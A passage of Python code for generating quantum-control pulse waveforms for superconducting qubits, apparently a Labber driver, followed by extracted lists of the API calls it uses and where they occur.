self._wave_xy[n])
def _predistort_z_waveforms(self):
# go through and predistort all waveforms
for n in range(self.n_qubit):
self._wave_z[n] = self._predistortions_z[n].predistort(
self._wave_z[n])
def _perform_crosstalk_compensation(self):
"""Compensate for Z-control crosstalk."""
self._wave_z = self._crosstalk.compensate(self._wave_z)
def _explode_composite_gates(self):
# Loop through the sequence until all CompositeGates are removed
# Note that there could be nested CompositeGates
n = 0
while n < len(self.sequence_list):
step = self.sequence_list[n]
i = 0
while i < len(step.gates):
gate = step.gates[i]
if isinstance(gate.gate, gates.CompositeGate):
# # log.info('In exploded composite, handling composite gate {} at step {}'.format(gate, n))
for m, g in enumerate(gate.gate.sequence):
new_gate = [x.gate for x in g.gates]
# Single gates shouldn't be lists
if len(new_gate) == 1:
new_gate = new_gate[0]
# Translate gate qubit number to device qubit number
new_qubit = [x.qubit for x in g.gates]
for j, q in enumerate(new_qubit):
if isinstance(q, int):
if isinstance(gate.qubit, int):
new_qubit[j] = gate.qubit
continue
new_qubit[j] = gate.qubit[q]
else:
new_qubit[j] = []
for k in q:
new_qubit[j].append(gate.qubit[k])
# Single qubit shouldn't be lists
if len(new_qubit) == 1:
new_qubit = new_qubit[0]
# # log.info('In explode composite; modifying {} by adding gate {} at index {}'.format(gate, new_gate, n+m))
self.sequence.add_gate(
new_qubit, new_gate, index=n + m)
del step.gates[i]
# # log.info('In composite gates, removing step {}', i)
continue
i = i + 1
n = n + 1
# Remove any empty steps where the composite gates were
i = 0
while i < len(self.sequence_list):
step = self.sequence_list[i]
if len(step.gates) == 0:
del self.sequence_list[i]
# log.info('In composite gates, removing step {}', i)
continue
i = i + 1
# for i, step in enumerate(self.sequence_list):
# log.info('At end of explode, step {} is {}'.format(i, step.gates))
def _perform_virtual_z(self):
"""Shifts the phase of pulses subsequent to virtual z gates."""
for qubit in range(self.n_qubit):
phase = 0
for step in self.sequence_list:
for gate in step.gates:
gate_obj = None
if qubit == gate.qubit: # TODO Allow for 2 qb
gate_obj = gate.gate
if isinstance(gate_obj, gates.VirtualZGate):
phase += gate_obj.theta
continue
if (isinstance(gate_obj, gates.SingleQubitXYRotation)
and phase != 0):
gate.gate = copy.copy(gate_obj)
gate.gate.phi += phase
# Need to recomput the pulse
gate.pulse = self._get_pulse_for_gate(gate)
def _add_microwave_gate(self):
"""Create waveform for gating microwave switch."""
n_wave = self.n_qubit if self.local_xy else 1
# go through all waveforms
for n, wave in enumerate(self._wave_xy[:n_wave]):
if self.uniform_gate:
# the uniform gate is all ones
gate = np.ones_like(wave)
# if creating readout trig, turn off gate during readout
if self.readout_trig_generate:
gate[-int((self.readout_trig_duration - self.gate_overlap -
self.gate_delay) * self.sample_rate):] = 0.0
else:
# non-uniform gate, find non-zero elements
gate = np.array(np.abs(wave) > 0.0, dtype=float)
# fix gate overlap
n_overlap = int(np.round(self.gate_overlap * self.sample_rate))
diff_gate = np.diff(gate)
indx_up = np.nonzero(diff_gate > 0.0)[0]
indx_down = np.nonzero(diff_gate < 0.0)[0]
# add extra elements to left and right for overlap
for indx in indx_up:
gate[max(0, indx - n_overlap):(indx + 1)] = 1.0
for indx in indx_down:
gate[indx:(indx + n_overlap + 1)] = 1.0
# fix gaps in gate shorter than min (look for 1>0)
diff_gate = np.diff(gate)
indx_up = np.nonzero(diff_gate > 0.0)[0]
indx_down = np.nonzero(diff_gate < 0.0)[0]
# ignore first transition if starting in zero
if gate[0] == 0:
indx_up = indx_up[1:]
n_down_up = min(len(indx_down), len(indx_up))
len_down = indx_up[:n_down_up] - indx_down[:n_down_up]
# find short gaps
short_gaps = np.nonzero(
len_down < (self.minimal_gate_time * self.sample_rate))[0]
for indx in short_gaps:
gate[indx_down[indx]:(1 + indx_up[indx])] = 1.0
# shift gate in time
n_shift = int(np.round(self.gate_delay * self.sample_rate))
if n_shift < 0:
n_shift = abs(n_shift)
gate = np.r_[gate[n_shift:], np.zeros((n_shift, ))]
elif n_shift > 0:
gate = np.r_[np.zeros((n_shift, )), gate[:(-n_shift)]]
# make sure gate starts/ends in 0
gate[0] = 0.0
gate[-1] = 0.0
# store results
self._wave_gate[n] = gate
def _filter_output_waveforms(self):
"""Filter output waveforms"""
# start with gate
if self.use_gate_filter and self.gate_filter_size > 1:
# prepare filter
window = self._get_filter_window(
self.gate_filter_size, self.gate_filter,
self.gate_filter_kaiser_beta)
# apply filter to all output waveforms
n_wave = self.n_qubit if self.local_xy else 1
for n in range(n_wave):
self._wave_gate[n] = self._apply_window_filter(
self._wave_gate[n], window)
# make sure gate starts/ends in 0
self._wave_gate[n][0] = 0.0
self._wave_gate[n][-1] = 0.0
# same for z waveforms
if self.use_z_filter and self.z_filter_size > 1:
# prepare filter
window = self._get_filter_window(
self.z_filter_size, self.z_filter, self.z_filter_kaiser_beta)
# apply filter to all output waveforms
for n in range(self.n_qubit):
self._wave_z[n] = self._apply_window_filter(
self._wave_z[n], window)
def _get_filter_window(self, size=11, window='Kaiser', kaiser_beta=14.0):
"""Get filter for waveform convolution"""
if window == 'Rectangular':
w = np.ones(size)
elif window == 'Bartlett':
# for filters that start/end in zeros, add 2 points and truncate
w = np.bartlett(max(1, size+2))
w = w[1:-1]
elif window == 'Blackman':
w = np.blackman(size + 2)
w = w[1:-1]
elif window == 'Hamming':
w = np.hamming(size)
elif window == 'Hanning':
w = np.hanning(size + 2)
w = w[1:-1]
elif window == 'Kaiser':
w = np.kaiser(size, kaiser_beta)
else:
raise('Unknown filter windows function %s.' % str(window))
return w/w.sum()
def _apply_window_filter(self, x, window):
"""Apply window filter to input waveform
Parameters
----------
x: np.array
Input waveform.
window: np.array
Filter waveform.
Returns
-------
np.array
Filtered waveform.
"""
# buffer waveform to avoid wrapping effects at boundaries
n = len(window)
s = np.r_[2*x[0] - x[n-1::-1], x, 2*x[-1] - x[-1:-n:-1]]
# apply convolution
y = np.convolve(s, window, mode='same')
return y[n:-n+1]
def _round(self, t, acc=1E-12):
"""Round the time `t` with a certain accuarcy `acc`.
Parameters
----------
t : float
The time to be rounded.
acc : float
The accuarcy (the default is 1E-12).
Returns
-------
float
The rounded time.
"""
return int(np.round(t / acc)) * acc
def _add_readout_trig(self):
"""Create waveform for readout trigger."""
trig = np.zeros_like(self.readout_iq)
start = (np.abs(self.readout_iq) > 0.0).nonzero()[0][0]
end = int(
np.min((start + self.readout_trig_duration * self.sample_rate,
self.n_pts_readout)))
trig[start:end] = self.readout_trig_amplitude
# make sure trig starts and ends in 0.
trig[0] = 0.0
trig[-1] = 0.0
self.readout_trig = trig
def _init_waveforms(self):
"""Initialize waveforms according to sequence settings."""
# To keep the first pulse delay, use the smallest delay as reference.
min_delay = np.min([
self.wave_xy_delays[:self.n_qubit],
self.wave_z_delays[:self.n_qubit]
])
self.wave_xy_delays -= min_delay
self.wave_z_delays -= min_delay
max_delay = np.max([
self.wave_xy_delays[:self.n_qubit],
self.wave_z_delays[:self.n_qubit]
])
# find the end of the sequence
# only include readout in size estimate if all waveforms have same size
if self.readout_match_main_size:
if len(self.sequence_list) == 0:
end = max_delay
else:
end = np.max(
[s.t_end for s in self.sequence_list]) + max_delay
else:
if len(self.sequence_list) <= 1:
end = max_delay
else:
end = np.max(
[s.t_end for s in self.sequence_list[0:-1]]) + max_delay
# create empty waveforms of the correct size
if self.trim_to_sequence:
self.n_pts = int(np.ceil(end * self.sample_rate)) + 1
if self.n_pts % 2 == 1:
# Odd n_pts give spectral leakage in FFT
self.n_pts += 1
for n in range(self.n_qubit):
self._wave_xy[n] = np.zeros(self.n_pts, dtype=np.complex)
# log.info('wave z {} initiated to 0'.format(n))
self._wave_z[n] = np.zeros(self.n_pts, dtype=float)
self._wave_gate[n] = np.zeros(self.n_pts, dtype=float)
# Waveform time vector
self.t = np.arange(self.n_pts) / self.sample_rate
# readout trig and i/q waveforms
if self.readout_match_main_size:
# same number of points for readout and main waveform
self.n_pts_readout = self.n_pts
else:
# different number of points for readout and main waveform
self.n_pts_readout = 1 + int(
np.ceil(self.sample_rate * (self.sequence_list[-1].t_end -
self.sequence_list[-1].t_start)))
if self.n_pts_readout % 2 == 1:
# Odd n_pts give spectral leakage in FFT
self.n_pts_readout += 1
self.readout_trig = np.zeros(self.n_pts_readout, dtype=float)
self.readout_iq = np.zeros(self.n_pts_readout, dtype=np.complex)
def _generate_waveforms(self):
"""Generate the waveforms corresponding to the sequence."""
# log.info('generating waveform from sequence. Len is {}'.format(len(self.sequence_list)))
for step in self.sequence_list:
# log.info('Generating gates {}'.format(step.gates))
for gate in step.gates:
qubit = gate.qubit
if isinstance(qubit, list):
qubit = qubit[0]
gate_obj = gate.gate
if isinstance(gate_obj,
(gates.IdentityGate, gates.VirtualZGate)):
continue
elif isinstance(gate_obj, gates.SingleQubitZRotation):
waveform = self._wave_z[qubit]
delay = self.wave_z_delays[qubit]
if self.compensate_crosstalk:
crosstalk = self._crosstalk.compensation_matrix[:,
qubit]
elif isinstance(gate_obj, gates.TwoQubitGate):
# log.info('adding 2qb gate waveforms')
waveform = self._wave_z[qubit]
delay = self.wave_z_delays[qubit]
if self.compensate_crosstalk:
crosstalk = self._crosstalk.compensation_matrix[:,
qubit]
elif isinstance(gate_obj, gates.SingleQubitXYRotation):
waveform = self._wave_xy[qubit]
delay = self.wave_xy_delays[qubit]
elif isinstance(gate_obj, gates.ReadoutGate):
waveform = self.readout_iq
delay = 0
else:
raise ValueError(
"Don't know which waveform to add {} to.".format(
gate_obj))
# get the range of indices in use
if (isinstance(gate_obj, gates.ReadoutGate)
and not self.readout_match_main_size):
# special case for readout if not matching main wave size
start = 0.0
end = self._round(step.t_end - step.t_start)
else:
start = self._round(step.t_start + delay)
end = self._round(step.t_end + delay)
if (self.compensate_crosstalk and
isinstance(gate_obj,
(gates.SingleQubitZRotation,
gates.TwoQubitGate))):
for q in range(self.n_qubit):
waveform = self._wave_z[q]
delay = self.wave_z_delays[q]
start = self._round(step.t_start + delay)
end = self._round(step.t_end + delay)
indices = np.arange(
max(np.floor(start * self.sample_rate), 0),
min(
np.ceil(end * self.sample_rate),
len(waveform)),
dtype=int)
# return directly if no indices
if len(indices) == 0:
continue
# calculate time values for the pulse indices
t = indices / self.sample_rate
max_duration = end - start
middle = end - max_duration / 2
if step.align == 'center':
t0 = middle
elif step.align == 'left':
t0 = middle - (max_duration - gate.duration) / 2
elif step.align == 'right':
t0 = middle + (max_duration - gate.duration) / 2
scaling_factor = float(crosstalk[q, 0])
if q != qubit:
scaling_factor = -scaling_factor
waveform[indices] += (
scaling_factor
* gate.pulse.calculate_waveform(t0, t))
else:
# calculate the pulse waveform for the selected indices
indices = np.arange(
max(np.floor(start * self.sample_rate), 0),
min(np.ceil(end * self.sample_rate), len(waveform)),
dtype=int)
# return directly if no indices
if len(indices) == 0:
continue
# calculate time values for the pulse indices
t = indices / self.sample_rate
max_duration = end - start
middle = end - max_duration / 2
if step.align == 'center':
t0 = middle
elif step.align == 'left':
t0 = middle - (max_duration - gate.duration) / 2
elif step.align == 'right':
t0 = middle + (max_duration - gate.duration) / 2
waveform[indices] += gate.pulse.calculate_waveform(t0, t)
def set_parameters(self, config={}):
"""Set base parameters using config from from Labber driver.
Parameters
----------
config : dict
Configuration as defined by Labber driver configuration window
"""
# sequence parameters
d = dict(
Zero=0,
One=1,
Two=2,
Three=3,
Four=4,
Five=5,
Six=6,
Seven=7,
Eight=8,
Nine=9)
# If the number of qubits changed, re-init to update pulses etc
if self.n_qubit != d[config.get('Number of qubits')]:
self.__init__(d[config.get('Number of qubits')])
self.dt = config.get('Pulse spacing')
self.local_xy = config.get('Local XY control')
# default for simultaneous pulses is true, only option for benchmarking
self.simultaneous_pulses = config.get('Simultaneous pulses', True)
# waveform parameters
self.sample_rate = config.get('Sample rate')
self.n_pts = int(config.get('Number of points', 0))
self.first_delay = config.get('First pulse delay')
self.trim_to_sequence = config.get('Trim waveform to sequence')
self.trim_start = config.get('Trim both start and end')
self.align_to_end = config.get('Align pulses to end of waveform')
# qubit spectra
for n in range(self.n_qubit):
m = n + 1 # pulses are indexed from 1 in Labber
qubit = qubits.Transmon(
config.get('f01 max #{}'.format(m)),
config.get('f01 min #{}'.format(m)),
config.get('Ec #{}'.format(m)),
config.get('Vperiod #{}'.format(m)),
config.get('Voffset #{}'.format(m)),
config.get('V0 #{}'.format(m)),
)
self.qubits[n] = qubit
# single-qubit pulses XY
for n, pulse in enumerate(self.pulses_1qb_xy):
m = n + 1 # pulses are indexed from 1 in Labber
pulse = (getattr(pulses, config.get('Pulse type'))(complex=True))
# global parameters
pulse.truncation_range = config.get('Truncation range')
pulse.start_at_zero = config.get('Start at zero')
pulse.use_drag = config.get('Use DRAG')
# pulse shape
if config.get('Uniform pulse shape'):
pulse.width = config.get('Width')
pulse.plateau = config.get('Plateau')
else:
pulse.width = config.get('Width #%d' % m)
pulse.plateau = config.get('Plateau #%d' % m)
if config.get('Uniform amplitude'):
pulse.amplitude = config.get('Amplitude')
else:
pulse.amplitude = config.get('Amplitude #%d' % m)
# pulse-specific parameters
pulse.frequency = config.get('Frequency #%d' % m)
pulse.drag_coefficient = config.get('DRAG scaling #%d' % m)
pulse.drag_detuning = config.get('DRAG frequency detuning #%d' % m)
self.pulses_1qb_xy[n] = pulse
# single-qubit pulses Z
for n, pulse in enumerate(self.pulses_1qb_z):
# pulses are indexed from 1 in Labber
m = n + 1
# global parameters
pulse = (getattr(pulses,
config.get('Pulse type, Z'))(complex=False))
pulse.truncation_range = config.get('Truncation range, Z')
pulse.start_at_zero = config.get('Start at zero, Z')
# pulse shape
if config.get('Uniform pulse shape, Z'):
pulse.width = config.get('Width, Z')
pulse.plateau = config.get('Plateau, Z')
else:
pulse.width = config.get('Width #%d, Z' % m)
pulse.plateau = config.get('Plateau #%d, Z' % m)
if config.get('Uniform amplitude, Z'):
pulse.amplitude = config.get('Amplitude, Z')
else:
pulse.amplitude = config.get('Amplitude #%d, Z' % m)
self.pulses_1qb_z[n] = pulse
# two-qubit pulses
for n, pulse in enumerate(self.pulses_2qb):
# pulses are indexed from 1 in Labber
s = ' #%d%d' % (n + 1, n + 2)
# global parameters
pulse = (getattr(pulses,
config.get('Pulse type, 2QB'))(complex=False))
if config.get('Pulse type, 2QB') in ['CZ', 'NetZero']:
pulse.F_Terms = d[config.get('Fourier terms, 2QB')]
if config.get('Uniform 2QB pulses'):
pulse.width = config.get('Width, 2QB')
pulse.plateau = config.get('Plateau, 2QB')
else:
pulse.width = config.get('Width, 2QB' + s)
pulse.plateau = config.get('Plateau, 2QB')
# spectra
if config.get('Assume linear dependence' + s, True):
pulse.qubit = None
else:
pulse.qubit = self.qubits[n]
# Get Fourier values
if d[config.get('Fourier terms, 2QB')] == 4:
pulse.Lcoeff = np.array([
config.get('L1, 2QB' + s),
config.get('L2, 2QB' + s),
config.get('L3, 2QB' + s),
config.get('L4, 2QB' + s)
])
elif d[config.get('Fourier terms, 2QB')] == 3:
pulse.Lcoeff = np.array([
config.get('L1, 2QB' + s),
config.get('L2, 2QB' + s),
config.get('L3, 2QB' + s)
])
elif d[config.get('Fourier terms, 2QB')] == 2:
pulse.Lcoeff = np.array(
[config.get('L1, 2QB' + s),
config.get('L2, 2QB' + s)])
elif d[config.get('Fourier terms, 2QB')] == 1:
pulse.Lcoeff = np.array([config.get('L1, 2QB' + s)])
pulse.Coupling = config.get('Coupling, 2QB' + s)
pulse.Offset = config.get('f11-f20 initial, 2QB' + s)
pulse.amplitude = config.get('f11-f20 final, 2QB' + s)
pulse.dfdV = config.get('df/dV, 2QB' + s)
pulse.negative_amplitude = config.get('Negative amplitude' + s)
pulse.calculate_cz_waveform()
else:
pulse.truncation_range = config.get('Truncation range, 2QB')
pulse.start_at_zero = config.get('Start at zero, 2QB')
# pulse shape
if config.get('Uniform 2QB pulses'):
pulse.width = config.get('Width, 2QB')
pulse.plateau = config.get('Plateau, 2QB')
else:
pulse.width = config.get('Width, 2QB' + s)
pulse.plateau = config.get('Plateau, 2QB' + s)
# pulse-specific parameters
pulse.amplitude = config.get('Amplitude, 2QB' + s)
gates.CZ.new_angles(
config.get('QB1 Phi 2QB #12'), config.get('QB2 Phi 2QB #12'))
gates.CR.update_params(config.get('CR amplitude'), config.get('CR phase'), config.get('CR frequency'), 0, config.get('CR length'), config.get('CR cancelation amplitude'), config.get('CR cancelation phase'), np.pi/2, 0, np.pi/2)
self.pulses_2qb[n] = pulse
# predistortion
self.perform_predistortion = config.get('Predistort waveforms', False)
# update all predistorting objects
for p in self._predistortions:
p.set_parameters(config)
# Z predistortion
self.perform_predistortion_z = config.get('Predistort Z')
for p in self._predistortions_z:
p.set_parameters(config)
# crosstalk
self.compensate_crosstalk = config.get('Compensate cross-talk', False)
self._crosstalk.set_parameters(config)
# gate switch waveform
self.generate_gate_switch = config.get('Generate gate')
self.uniform_gate = config.get('Uniform gate')
self.gate_delay = config.get('Gate delay')
self.gate_overlap = config.get('Gate overlap')
self.minimal_gate_time = config.get('Minimal gate time')
# filters
self.use_gate_filter = config.get('Filter gate waveforms', False)
self.gate_filter = config.get('Gate filter', 'Kaiser')
self.gate_filter_size = int(config.get('Gate - Filter size', 5))
self.gate_filter_kaiser_beta = config.get(
'Gate - Kaiser beta', 14.0)
self.use_z_filter = config.get('Filter Z waveforms', False)
self.z_filter = config.get('Z filter', 'Kaiser')
self.z_filter_size = int(config.get('Z - Filter size', 5))
self.z_filter_kaiser_beta = config.get(
'Z - Kaiser beta', 14.0)
# readout
self.readout_match_main_size = config.get(
'Match main sequence waveform size')
self.readout_i_offset = config.get('Readout offset - I')
self.readout_q_offset = config.get('Readout offset - Q')
self.readout_trig_generate = config.get('Generate readout trig')
self.readout_trig_amplitude = config.get('Readout trig amplitude')
self.readout_trig_duration = config.get('Readout trig duration')
self.readout_predistort = config.get('Predistort readout waveform')
self.readout.set_parameters(config)
# get readout pulse parameters
phases = 2 * np.pi * np.array([
0.8847060, 0.2043214, 0.9426104, 0.6947334, 0.8752361, 0.2246747,
0.6503154, 0.7305004, 0.1309068
])
for n, pulse in enumerate(self.pulses_readout):
# pulses are indexed from 1 in Labber
m = n + 1
pulse = (getattr(pulses,
config.get('Readout pulse type'))(complex=True))
pulse.truncation_range = config.get('Readout truncation range')
pulse.start_at_zero = config.get('Readout start at zero')
pulse.iq_skew = config.get('Readout IQ skew') * np.pi / 180
pulse.iq_ratio = config.get('Readout I/Q ratio')
if config.get('Distribute readout phases'):
pulse.phase = phases[n]
else:
pulse.phase = 0
if config.get('Uniform readout pulse shape'):
pulse.width = config.get('Readout width')
pulse.plateau = config.get('Readout duration')
else:
pulse.width = config.get('Readout width #%d' % m)
pulse.plateau = config.get('Readout duration #%d' % m)
if config.get('Uniform readout amplitude') is True:
pulse.amplitude = config.get('Readout amplitude')
else:
pulse.amplitude = config.get('Readout amplitude #%d' % (n + 1))
pulse.frequency = config.get('Readout frequency #%d' % m)
self.pulses_readout[n] = pulse
# Delays
self.wave_xy_delays = np.zeros(self.n_qubit)
self.wave_z_delays = np.zeros(self.n_qubit)
for n in range(self.n_qubit):
m = n + 1
self.wave_xy_delays[n] = config.get('Qubit %d XY Delay' % m)
self.wave_z_delays[n] = config.get('Qubit %d Z Delay' % m)
if __name__ == '__main__':
pass
|
[
"numpy.kaiser",
"numpy.sum",
"readout.Demodulation",
"numpy.abs",
"numpy.floor",
"numpy.ones",
"numpy.arange",
"numpy.convolve",
"numpy.round",
"predistortion.Predistortion",
"tomography.StateTomography",
"numpy.zeros_like",
"crosstalk.Crosstalk",
"numpy.max",
"tomography.ProcessTomography",
"gates.ReadoutGate",
"numpy.hanning",
"numpy.ones_like",
"numpy.ceil",
"gates.IdentityGate",
"numpy.hamming",
"gates.CustomGate",
"numpy.min",
"predistortion.ExponentialPredistortion",
"numpy.blackman",
"qubits.Qubit",
"numpy.zeros",
"copy.copy",
"numpy.nonzero",
"numpy.diff",
"numpy.array",
"logging.getLogger"
] |
[((232, 265), 'logging.getLogger', 'logging.getLogger', (['"""LabberDriver"""'], {}), "('LabberDriver')\n", (249, 265), False, 'import logging\n'), ((5054, 5084), 'tomography.ProcessTomography', 'tomography.ProcessTomography', ([], {}), '()\n', (5082, 5084), False, 'import tomography\n'), ((5192, 5220), 'tomography.StateTomography', 'tomography.StateTomography', ([], {}), '()\n', (5218, 5220), False, 'import tomography\n'), ((7377, 7400), 'gates.CustomGate', 'gates.CustomGate', (['pulse'], {}), '(pulse)\n', (7393, 7400), False, 'import gates\n'), ((16514, 16536), 'numpy.zeros', 'np.zeros', (['self.n_qubit'], {}), '(self.n_qubit)\n', (16522, 16536), True, 'import numpy as np\n'), ((16566, 16588), 'numpy.zeros', 'np.zeros', (['self.n_qubit'], {}), '(self.n_qubit)\n', (16574, 16588), True, 'import numpy as np\n'), ((16965, 16986), 'crosstalk.Crosstalk', 'crosstalk.Crosstalk', ([], {}), '()\n', (16984, 16986), False, 'import crosstalk\n'), ((17754, 17788), 'readout.Demodulation', 'readout.Demodulation', (['self.n_qubit'], {}), '(self.n_qubit)\n', (17774, 17788), False, 'import readout\n'), ((17817, 17842), 'numpy.array', 'np.array', (['[]'], {'dtype': 'float'}), '([], dtype=float)\n', (17825, 17842), True, 'import numpy as np\n'), ((17869, 17899), 'numpy.array', 'np.array', (['[]'], {'dtype': 'np.complex'}), '([], dtype=np.complex)\n', (17877, 17899), True, 'import numpy as np\n'), ((33956, 33991), 'numpy.convolve', 'np.convolve', (['s', 'window'], {'mode': '"""same"""'}), "(s, window, mode='same')\n", (33967, 33991), True, 'import numpy as np\n'), ((34511, 34541), 'numpy.zeros_like', 'np.zeros_like', (['self.readout_iq'], {}), '(self.readout_iq)\n', (34524, 34541), True, 'import numpy as np\n'), ((35119, 35198), 'numpy.min', 'np.min', (['[self.wave_xy_delays[:self.n_qubit], self.wave_z_delays[:self.n_qubit]]'], {}), '([self.wave_xy_delays[:self.n_qubit], self.wave_z_delays[:self.n_qubit]])\n', (35125, 35198), True, 'import numpy as np\n'), ((35334, 35413), 'numpy.max', 'np.max', (['[self.wave_xy_delays[:self.n_qubit], self.wave_z_delays[:self.n_qubit]]'], {}), '([self.wave_xy_delays[:self.n_qubit], self.wave_z_delays[:self.n_qubit]])\n', (35340, 35413), True, 'import numpy as np\n'), ((37333, 37374), 'numpy.zeros', 'np.zeros', (['self.n_pts_readout'], {'dtype': 'float'}), '(self.n_pts_readout, dtype=float)\n', (37341, 37374), True, 'import numpy as np\n'), ((37401, 37447), 'numpy.zeros', 'np.zeros', (['self.n_pts_readout'], {'dtype': 'np.complex'}), '(self.n_pts_readout, dtype=np.complex)\n', (37409, 37447), True, 'import numpy as np\n'), ((54003, 54025), 'numpy.zeros', 'np.zeros', (['self.n_qubit'], {}), '(self.n_qubit)\n', (54011, 54025), True, 'import numpy as np\n'), ((54055, 54077), 'numpy.zeros', 'np.zeros', (['self.n_qubit'], {}), '(self.n_qubit)\n', (54063, 54077), True, 'import numpy as np\n'), ((6211, 6255), 'gates.IdentityGate', 'gates.IdentityGate', ([], {'width': 'self.readout_delay'}), '(width=self.readout_delay)\n', (6229, 6255), False, 'import gates\n'), ((6331, 6350), 'gates.ReadoutGate', 'gates.ReadoutGate', ([], {}), '()\n', (6348, 6350), False, 'import gates\n'), ((16103, 16117), 'qubits.Qubit', 'qubits.Qubit', ([], {}), '()\n', (16115, 16117), False, 'import qubits\n'), ((16207, 16236), 'numpy.zeros', 'np.zeros', (['(0)'], {'dtype': 'np.complex'}), '(0, dtype=np.complex)\n', (16215, 16236), True, 'import numpy as np\n'), ((16346, 16357), 'numpy.zeros', 'np.zeros', (['(0)'], {}), '(0)\n', (16354, 16357), True, 'import numpy as np\n'), ((16415, 16426), 'numpy.zeros', 'np.zeros', (['(0)'], {}), '(0)\n', (16423, 16426), True, 'import numpy as np\n'), ((17100, 17130), 'predistortion.Predistortion', 'predistortion.Predistortion', (['n'], {}), '(n)\n', (17127, 17130), False, 'import predistortion\n'), ((17217, 17258), 'predistortion.ExponentialPredistortion', 'predistortion.ExponentialPredistortion', (['n'], {}), '(n)\n', (17255, 17258), False, 'import predistortion\n'), ((19695, 19734), 'numpy.sum', 'np.sum', (['self._wave_xy[:self.n_qubit]', '(0)'], {}), '(self._wave_xy[:self.n_qubit], 0)\n', (19701, 19734), True, 'import numpy as np\n'), ((22141, 22181), 'numpy.max', 'np.max', (['[x.duration for x in step.gates]'], {}), '([x.duration for x in step.gates])\n', (22147, 22181), True, 'import numpy as np\n'), ((32788, 32801), 'numpy.ones', 'np.ones', (['size'], {}), '(size)\n', (32795, 32801), True, 'import numpy as np\n'), ((34637, 34725), 'numpy.min', 'np.min', (['(start + self.readout_trig_duration * self.sample_rate, self.n_pts_readout)'], {}), '((start + self.readout_trig_duration * self.sample_rate, self.\n n_pts_readout))\n', (34643, 34725), True, 'import numpy as np\n'), ((36369, 36407), 'numpy.zeros', 'np.zeros', (['self.n_pts'], {'dtype': 'np.complex'}), '(self.n_pts, dtype=np.complex)\n', (36377, 36407), True, 'import numpy as np\n'), ((36499, 36532), 'numpy.zeros', 'np.zeros', (['self.n_pts'], {'dtype': 'float'}), '(self.n_pts, dtype=float)\n', (36507, 36532), True, 'import numpy as np\n'), ((36566, 36599), 'numpy.zeros', 'np.zeros', (['self.n_pts'], {'dtype': 'float'}), '(self.n_pts, dtype=float)\n', (36574, 36599), True, 'import numpy as np\n'), ((36649, 36670), 'numpy.arange', 'np.arange', (['self.n_pts'], {}), '(self.n_pts)\n', (36658, 36670), True, 'import numpy as np\n'), ((52464, 52577), 'numpy.array', 'np.array', (['[0.884706, 0.2043214, 0.9426104, 0.6947334, 0.8752361, 0.2246747, 0.6503154,\n 0.7305004, 0.1309068]'], {}), '([0.884706, 0.2043214, 0.9426104, 0.6947334, 0.8752361, 0.2246747, \n 0.6503154, 0.7305004, 0.1309068])\n', (52472, 52577), True, 'import numpy as np\n'), ((29150, 29168), 'numpy.ones_like', 'np.ones_like', (['wave'], {}), '(wave)\n', (29162, 29168), True, 'import numpy as np\n'), ((29730, 29743), 'numpy.diff', 'np.diff', (['gate'], {}), '(gate)\n', (29737, 29743), True, 'import numpy as np\n'), ((30227, 30240), 'numpy.diff', 'np.diff', (['gate'], {}), '(gate)\n', (30234, 30240), True, 'import numpy as np\n'), ((34386, 34403), 'numpy.round', 'np.round', (['(t / acc)'], {}), '(t / acc)\n', (34394, 34403), True, 'import numpy as np\n'), ((29654, 29700), 'numpy.round', 'np.round', (['(self.gate_overlap * self.sample_rate)'], {}), '(self.gate_overlap * self.sample_rate)\n', (29662, 29700), True, 'import numpy as np\n'), ((29770, 29797), 'numpy.nonzero', 'np.nonzero', (['(diff_gate > 0.0)'], {}), '(diff_gate > 0.0)\n', (29780, 29797), True, 'import numpy as np\n'), ((29829, 29856), 'numpy.nonzero', 'np.nonzero', (['(diff_gate < 0.0)'], {}), '(diff_gate < 0.0)\n', (29839, 29856), True, 'import numpy as np\n'), ((30267, 30294), 'numpy.nonzero', 'np.nonzero', (['(diff_gate > 0.0)'], {}), '(diff_gate > 0.0)\n', (30277, 30294), True, 'import numpy as np\n'), ((30326, 30353), 'numpy.nonzero', 'np.nonzero', (['(diff_gate < 0.0)'], {}), '(diff_gate < 0.0)\n', (30336, 30353), True, 'import numpy as np\n'), ((30690, 30754), 'numpy.nonzero', 'np.nonzero', (['(len_down < self.minimal_gate_time * self.sample_rate)'], {}), '(len_down < self.minimal_gate_time * self.sample_rate)\n', (30700, 30754), True, 'import numpy as np\n'), ((30957, 31001), 'numpy.round', 'np.round', (['(self.gate_delay * self.sample_rate)'], {}), '(self.gate_delay * self.sample_rate)\n', (30965, 31001), True, 'import numpy as np\n'), ((33033, 33054), 'numpy.blackman', 'np.blackman', (['(size + 2)'], {}), '(size + 2)\n', (33044, 33054), True, 'import numpy as np\n'), ((35726, 35771), 'numpy.max', 'np.max', (['[s.t_end for s in self.sequence_list]'], {}), '([s.t_end for s in self.sequence_list])\n', (35732, 35771), True, 'import numpy as np\n'), ((35936, 35987), 'numpy.max', 'np.max', (['[s.t_end for s in self.sequence_list[0:-1]]'], {}), '([s.t_end for s in self.sequence_list[0:-1]])\n', (35942, 35987), True, 'import numpy as np\n'), ((36138, 36169), 'numpy.ceil', 'np.ceil', (['(end * self.sample_rate)'], {}), '(end * self.sample_rate)\n', (36145, 36169), True, 'import numpy as np\n'), ((37026, 37122), 'numpy.ceil', 'np.ceil', (['(self.sample_rate * (self.sequence_list[-1].t_end - self.sequence_list[-1].\n t_start))'], {}), '(self.sample_rate * (self.sequence_list[-1].t_end - self.\n sequence_list[-1].t_start))\n', (37033, 37122), True, 'import numpy as np\n'), ((28616, 28635), 'copy.copy', 'copy.copy', (['gate_obj'], {}), '(gate_obj)\n', (28625, 28635), False, 'import copy\n'), ((29554, 29566), 'numpy.abs', 'np.abs', (['wave'], {}), '(wave)\n', (29560, 29566), True, 'import numpy as np\n'), ((33129, 33145), 'numpy.hamming', 'np.hamming', (['size'], {}), '(size)\n', (33139, 33145), True, 'import numpy as np\n'), ((31127, 31147), 'numpy.zeros', 'np.zeros', (['(n_shift,)'], {}), '((n_shift,))\n', (31135, 31147), True, 'import numpy as np\n'), ((33196, 33216), 'numpy.hanning', 'np.hanning', (['(size + 2)'], {}), '(size + 2)\n', (33206, 33216), True, 'import numpy as np\n'), ((34559, 34582), 'numpy.abs', 'np.abs', (['self.readout_iq'], {}), '(self.readout_iq)\n', (34565, 34582), True, 'import numpy as np\n'), ((41886, 41920), 'numpy.floor', 'np.floor', (['(start * self.sample_rate)'], {}), '(start * self.sample_rate)\n', (41894, 41920), True, 'import numpy as np\n'), ((41954, 41985), 'numpy.ceil', 'np.ceil', (['(end * self.sample_rate)'], {}), '(end * self.sample_rate)\n', (41961, 41985), True, 'import numpy as np\n'), 